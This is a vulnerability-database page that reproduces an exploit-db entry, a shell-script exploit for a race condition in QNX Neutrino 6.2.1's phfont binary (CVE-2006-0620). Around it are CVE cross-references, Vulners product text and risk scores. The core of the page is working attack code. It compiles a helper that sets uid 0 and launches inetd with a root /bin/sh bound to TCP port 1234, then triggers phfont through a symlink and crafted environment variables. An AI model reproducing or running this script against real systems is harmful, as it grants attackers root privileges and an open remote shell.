Lucene search
+L

QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation

🗓️ 08 Feb 2006 00:00:00Reported by kokaninType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

QNX Neutrino 6.2.1 'phfont' race condition privilege escalation vulnerability exploit from 200

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-0620
9 Feb 200602:00
cve
cvelist
Cvelist
CVE-2006-0620
9 Feb 200602:00
cvelist
euvd
EUVD
EUVD-2006-0627
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-0620
9 Feb 200602:02
nvd
prion
Prion
Race condition
9 Feb 200602:02
prion
#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86
cat > phfontphf.c << __EOF__
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
}
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*

# milw0rm.com [2006-02-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.2
EPSS0.00802
42